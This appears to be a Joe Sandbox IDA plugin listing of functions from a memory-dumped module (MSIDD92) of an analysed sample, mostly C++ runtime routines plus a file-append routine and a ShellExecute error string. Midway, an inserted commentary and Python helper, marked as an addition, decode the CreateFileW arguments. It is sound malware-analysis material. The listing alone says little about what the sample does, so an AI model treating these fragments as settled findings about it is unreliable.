                                                                      • Instruction ID: f69ab6bb1443ba84798129bcf24baa77638ce4b43eb2c248cf8142f7b61db76a
                                                                      • Opcode Fuzzy Hash: 52febe46b16e39be5e9a1a0b7cabde91443f93228eb48f37872e2abe919af76a
                                                                      • Instruction Fuzzy Hash: 0FD159B5D04648DFCB15CFA8D880AEDBBB5FF49300F28456AE856EB351D730A946CB60
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: _strcspn$H_prolog3_ctype
                                                                      • String ID:
                                                                      • API String ID: 838279627-0
                                                                      • Opcode ID: 3eaddabe75bd379f844137d4ecb93d00871002781e040ba9ebd2ed9f1d446380
                                                                      • Instruction ID: 790eacfcab838f25d4556219affe6be028f9795dfd90c42c477a537570943de1
                                                                      • Opcode Fuzzy Hash: 3eaddabe75bd379f844137d4ecb93d00871002781e040ba9ebd2ed9f1d446380
                                                                      • Instruction Fuzzy Hash: 3DC14B71900249DFDF19EF98C985AEEBBB9FF48310F64401AE805A7251DB30AE45DBB1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: _strcspn$H_prolog3_ctype
                                                                      • String ID:
                                                                      • API String ID: 838279627-0
                                                                      • Opcode ID: 621b41520a8c16b1c0be6c18ae63677bbd25e95f89390577abff788d9b1e78e9
                                                                      • Instruction ID: 962ae3e691d89066893bfff7091f6c1461879154b087ce635da78df47d61fe1f
                                                                      • Opcode Fuzzy Hash: 621b41520a8c16b1c0be6c18ae63677bbd25e95f89390577abff788d9b1e78e9
                                                                      • Instruction Fuzzy Hash: E7C15C71900249EFDF15EFA8C981AFEBBB9EF48310F14451AE805AB255D730AE45CBB1
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D94F27
                                                                      • collate.LIBCPMT ref: 00D94F33
                                                                        • Part of subcall function 00D93E70: __EH_prolog3_GS.LIBCMT ref: 00D93E77
                                                                        • Part of subcall function 00D93E70: __Getcoll.LIBCPMT ref: 00D93EDB
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • __Getcoll.LIBCPMT ref: 00D94F76
                                                                        • Part of subcall function 00D93CD4: __EH_prolog3.LIBCMT ref: 00D93CDB
                                                                        • Part of subcall function 00D93CD4: std::_Lockit::_Lockit.LIBCPMT ref: 00D93CE5
                                                                        • Part of subcall function 00D93CD4: std::_Lockit::~_Lockit.LIBCPMT ref: 00D93D56
                                                                        • Part of subcall function 00D84403: __EH_prolog3.LIBCMT ref: 00D8440A
                                                                        • Part of subcall function 00D84403: std::_Lockit::_Lockit.LIBCPMT ref: 00D84414
                                                                        • Part of subcall function 00D84403: std::_Lockit::~_Lockit.LIBCPMT ref: 00D844BB
                                                                      • numpunct.LIBCPMT ref: 00D951A6
                                                                        • Part of subcall function 00D784C0: LocalAlloc.KERNEL32(00000040,00000000,00D9839D,00000000,862265DA,?,00000000,?,00000000,?,00DBCB8D,000000FF,?,00D717D5,00000000,00DBD3BA), ref: 00D784C6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$Getcoll$AllocH_prolog3_Localcollatenumpunct
                                                                      • String ID:
                                                                      • API String ID: 2732324234-0
                                                                      • Opcode ID: 4359ad990d4e3909d6515cdc82977122d7a526f60ebd97d5abef5145afe0a8d4
                                                                      • Instruction ID: 50fb424da9c5961688f8e5284009274da8c555de6c5483a3321ed0280b1564b5
                                                                      • Opcode Fuzzy Hash: 4359ad990d4e3909d6515cdc82977122d7a526f60ebd97d5abef5145afe0a8d4
                                                                      • Instruction Fuzzy Hash: DB91D671900712ABDF21AB759806B7F7AA9EF41360F15852EF849A7346EF70890087F1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustPointer
                                                                      • String ID:
                                                                      • API String ID: 1740715915-0
                                                                      • Opcode ID: 6072a8d19557620ac795c686f60c2d85f1d8e8368f97596a00913198da981cc8
                                                                      • Instruction ID: 0f246aa2e34e6b3ea08248eef2a1be5aafe904c84adccf945f7b28da456e3f51
                                                                      • Opcode Fuzzy Hash: 6072a8d19557620ac795c686f60c2d85f1d8e8368f97596a00913198da981cc8
                                                                      • Instruction Fuzzy Hash: E851C372601302AFDF258F14EA51B6A77A4FF41720F1A452EEC5A97291E731EC40D7B0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6e470bb95c3f34493103a2d238da4cb4ebb341420b57bcf5e2c1038790a05685
                                                                      • Instruction ID: af825b01c4cb5a9b0d341ceb6077eb2a0671e2ba6859adcb1c9fae95465d31d5
                                                                      • Opcode Fuzzy Hash: 6e470bb95c3f34493103a2d238da4cb4ebb341420b57bcf5e2c1038790a05685
                                                                      • Instruction Fuzzy Hash: 69216DB2608205AFDB20AF75CC41D6B7BA9EF423A47148925F955D7652EB31EC40C7B0
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000000,00000000,76B15490,00D78B3A,00000000,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D79027
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                      • API String ID: 1452528299-1781106413
                                                                      • Opcode ID: 9ee7693641a3507077bfb5736453dd5a5eadd7e0674066a3730e8100d7bf0cdc
                                                                      • Instruction ID: 3ea310c7eb6f007d98e60699e9725c0faf408b5f9301aef016526a13b6979b74
                                                                      • Opcode Fuzzy Hash: 9ee7693641a3507077bfb5736453dd5a5eadd7e0674066a3730e8100d7bf0cdc
                                                                      • Instruction Fuzzy Hash: 80216A4AA2026286CB341F288416739A2F0EF54765F28442FE88DC7394FA698C81D3A1
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D8440A
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D84414
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D844BB
                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00D844C6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
                                                                      • String ID:
                                                                      • API String ID: 4244582100-0
                                                                      • Opcode ID: 8f1a72f825a49d08a1961b73fb9d91a4f03c8e345a76b854bd56407014b71e9b
                                                                      • Instruction ID: 37ad4d142926608b61791baf7b091da29298a39d161402747f7e5d19a1f81a61
                                                                      • Opcode Fuzzy Hash: 8f1a72f825a49d08a1961b73fb9d91a4f03c8e345a76b854bd56407014b71e9b
                                                                      • Instruction Fuzzy Hash: 31214C34A00616DFCB04EF18C891A6CB761FF45720F04855AE9169B3A1DF70ED10CFA4
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,862265DA), ref: 00D8143C
                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00D8145C
                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00D8148D
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00D814A6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandlePointerWrite
                                                                      • String ID:
                                                                      • API String ID: 3604237281-0
                                                                      • Opcode ID: 961f648b5b94b2ac89eeec0571cb53ec0baa6f7eb8d338cacd0ea916505a3a95
                                                                      • Instruction ID: 371c2c6ecb7a077948667dd68bef15020f51e2fdc48129c93afbd26b1d5e7e81
                                                                      • Opcode Fuzzy Hash: 961f648b5b94b2ac89eeec0571cb53ec0baa6f7eb8d338cacd0ea916505a3a95
                                                                      • Instruction Fuzzy Hash: 7E218174941319EFD7209F54DC0AFAABBB8EB05B24F10421AF511EB3C0D7B45A05CBA4
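The CreateFileW / SetFilePointer / WriteFile / CloseHandle sequence in the entry above is an append-to-file routine: the hexadecimal arguments the IDA plugin recovered decode to GENERIC_WRITE (0x40000000), FILE_SHARE_READ (1), OPEN_ALWAYS (4) and FILE_ATTRIBUTE_NORMAL (0x80) for CreateFileW, and FILE_END (2) as the dwMoveMethod of SetFilePointer, so each call appends to an existing file or creates it. The following Python helper is an added example and not part of the Joe Sandbox report; it parses API lines in the exact format printed here and decodes them. The four sample lines are copied from the entry above; the parameter counts per API and the assumption that values listed beyond an API's parameter count are caller stack residue (note how the CreateFileW arguments reappear at the tail of the later calls) are mine.

```python
import re

# Constructed sample: the four API lines copied from the function entry above,
# bullets included, exactly as the report prints them.
SAMPLE = """\
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,862265DA), ref: 00D8143C
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00D8145C
• WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00D8148D
• CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00D814A6
"""

LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Parameter counts of the Win32 APIs involved. Assumption: anything listed past
# the arity is caller stack residue dumped along with the real arguments.
ARITY = {"CreateFileW": 7, "SetFilePointer": 4, "WriteFile": 5, "CloseHandle": 1}

# Win32 constants for the parameters being decoded.
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ATTRIB = {0x02: "FILE_ATTRIBUTE_HIDDEN", 0x80: "FILE_ATTRIBUTE_NORMAL",
          0x100: "FILE_ATTRIBUTE_TEMPORARY", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}
MOVE = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}


def parse_calls(text):
    """Return [(api, args, ref)] for every '<api>.<module>(args), ref: <addr>' line.
    '?' (a value the plugin could not resolve) becomes None; others are parsed as hex.
    Only the first ARITY[api] values are kept as arguments."""
    calls = []
    for line in text.splitlines():
        line = line.strip().lstrip("•").strip()
        m = LINE_RE.match(line)
        if not m:
            continue
        api = m.group("api")
        raw = m.group("args").split(",")
        keep = raw[:ARITY.get(api, len(raw))]
        args = [None if a == "?" else int(a, 16) for a in keep]
        calls.append((api, args, int(m.group("ref"), 16)))
    return calls


def flag_names(value, table):
    """Decode a bitmask into 'A|B' names; bits not in the table are kept as hex."""
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) if names else "0"


def name_of(value, table):
    """Decode a single enumerated value; unknown values are kept as hex."""
    if value is None:
        return "?"
    return table.get(value, f"0x{value:X}")


def summarize(calls):
    """Describe the file operation the call sequence performs."""
    out = {"access": None, "share": None, "disposition": None,
           "attributes": None, "seek": None, "writes": 0, "pattern": "unknown"}
    for api, args, _ in calls:
        if api == "CreateFileW" and len(args) >= 7:
            out["access"] = flag_names(args[1], ACCESS)
            out["share"] = flag_names(args[2], SHARE)
            out["disposition"] = name_of(args[4], DISPOSITION)
            out["attributes"] = flag_names(args[5], ATTRIB)
        elif api == "SetFilePointer" and len(args) >= 4:
            out["seek"] = name_of(args[3], MOVE)
        elif api == "WriteFile":
            out["writes"] += 1
    # A write handle plus at least one WriteFile is a file write; seeking to
    # FILE_END first makes it an append.
    if out["access"] and "GENERIC_WRITE" in out["access"] and out["writes"]:
        out["pattern"] = "append-to-file" if out["seek"] == "FILE_END" else "write-to-file"
    return out


if __name__ == "__main__":
    calls = parse_calls(SAMPLE)
    for api, args, ref in calls:
        print(f"{ref:08X} {api}{tuple(args)}")
    print(summarize(calls))
```

The same decoding tables apply to any other CreateFileW entry in the report; the plugin prints the arguments in declaration order, so the access mask is always the second value and the creation disposition the fifth.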
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D880CC
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D880D6
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D88127
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D88147
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 5d3fc832bd7c8878af44da63b8659a889444b3d73d62b9a8a64c2bf372ae60b1
                                                                      • Instruction ID: b22bf961568e6c1e810202f20fbbf642ce7d0e8bd9daf87cf1e0f8647d0085de
                                                                      • Opcode Fuzzy Hash: 5d3fc832bd7c8878af44da63b8659a889444b3d73d62b9a8a64c2bf372ae60b1
                                                                      • Instruction Fuzzy Hash: ED01C075940359DBCF01FB64D8466AE7762EF80720F68440AE415AB391EF709E029BB0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D881F6
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D88200
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D88251
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D88271
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 3b21467cb427c33200691fffe8dea2e0e76982ec2e2f847f6d5c65548ac8191f
                                                                      • Instruction ID: ea13ab3abc570f5f28a1d531c0c83e8a380a0c66c11993fa22dacf099ac18fdd
                                                                      • Opcode Fuzzy Hash: 3b21467cb427c33200691fffe8dea2e0e76982ec2e2f847f6d5c65548ac8191f
                                                                      • Instruction Fuzzy Hash: 8701C075900619CBCF01FBA4D8067ADB761EF80720F29440AE811AB391EF709E019BB4
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D88161
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D8816B
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D881BC
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D881DC
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: d416fec07020b60f4105fbb8779faab84cddb567bd570c2f3465c672c5e5fb0a
                                                                      • Instruction ID: 9a6aeda7fbecaf3c67fbcc2ec608b302bb02f48a9021d5a74a77370465f63115
                                                                      • Opcode Fuzzy Hash: d416fec07020b60f4105fbb8779faab84cddb567bd570c2f3465c672c5e5fb0a
                                                                      • Instruction Fuzzy Hash: 0301C035900719DBCB01FBA4D8466BE77A1EF84720F68450AF411AB391EF709E029BB0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D82700
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D8270A
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D8275B
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D8277B
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 004fccb6ec3ced7f571f9192597cf2a5c39a1a98bf1ac6223a6630975c3ff232
                                                                      • Instruction ID: a32c1f8c5859387a9225139f15f735e55392da436d23008e2d64c988dfe2079d
                                                                      • Opcode Fuzzy Hash: 004fccb6ec3ced7f571f9192597cf2a5c39a1a98bf1ac6223a6630975c3ff232
                                                                      • Instruction Fuzzy Hash: 8C01C075900219DBCB01FBA4D8066BD77A1EF84720F28410AE410AB391EF709E01ABB0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D82795
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D8279F
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D827F0
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D82810
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 0c711dc5d6244387f3c8fdb7a61664e4c74805748b7057e0c312c50849ac5bf5
                                                                      • Instruction ID: 747a05c8ca10b0b1df123dc4e73be285f2e19ebe0d6173b00453f0c7786a0c89
                                                                      • Opcode Fuzzy Hash: 0c711dc5d6244387f3c8fdb7a61664e4c74805748b7057e0c312c50849ac5bf5
                                                                      • Instruction Fuzzy Hash: A5019275900259DBCF05FB64E8066BE77B5EF80720F28450AF415AB391EF749E019BB1
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D879D0
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D879DA
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87A2B
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87A4B
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: a61aa68e30ea48733240120e89ff8537e7df4061dc77ced7f33254e41f8e48b7
                                                                      • Instruction ID: 06b98894f24426d7218527dec1a792d9acfc95a94ec7ca0e0301345a04e80d8e
                                                                      • Opcode Fuzzy Hash: a61aa68e30ea48733240120e89ff8537e7df4061dc77ced7f33254e41f8e48b7
                                                                      • Instruction Fuzzy Hash: C201D235904219DBCF05FB64E8466AE7B65EF80720F28440EF528AB391EF70DE018BB0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D939F2
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D939FC
